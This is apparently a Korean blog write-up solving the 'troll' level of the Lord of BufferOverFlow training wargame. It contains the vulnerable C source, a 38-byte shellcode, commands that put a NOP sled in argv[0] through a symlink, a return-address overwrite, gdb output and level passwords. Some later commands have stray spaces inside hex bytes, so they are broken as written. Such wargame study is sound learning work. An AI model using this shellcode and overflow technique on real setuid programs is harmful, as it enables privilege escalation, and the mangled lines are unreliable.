[Lord Of BufferOverFlow] 8번 orge -> troll

login : orge

password : timewalker

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more!
        memset(argv[1], 0, strlen(argv[1]));
}

argc가 2개여야한다.

또한 argv[1]값을 0으로 만든다. == argv[1]에 입력불가능

 

argv[0]에는 공격할수있다.

이전문제와 동일하게 심볼릭링크를 이용하겠다.

 

쉘코드에 \x2f가 들어가있으면

\x2f를 / 로 인식을 해서  심볼릭 링크가 제대로 안생긴다.

그래서 다른 쉘코드를 사용하자

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

38byte

 

cp troll test

ln -s test `python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

 

심볼릭링크 생성 후

 

./`python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print"a"*44+"\xbf\xbf\xbf\xbf"'`

 

core파일 gdb

0xbffffa70:     0xbffffa9d      0x00000000      0x00000000      0x00000000
0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa90:     0x00000000      0x00000000      0x00000000      0x38366900
0xbffffaa0:     0x2f2e0036      0x90909090      0x90909090      0x90909090
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x90909090      0x90909090      0x90909090

 기존 심볼릭 링크 지워주기

 rm `python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

 

다시 원본파일 심볼릭링크 생성

 ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x3 1\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xf f\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9 a\xb1\x0c\xce\x81"'`

 

core에서 알아온 주소

0xbffffac0 넣어주기

`python -c 'print "A"*44 +" \xc0\xfa\xff\xbf"'`

삽질하느라 1시간넘게 걸렸다;

도대체 왜 자꾸 stack is still your friend.가 뜨는걸까.....

스택이랑 친구 안할래;

 

aspirin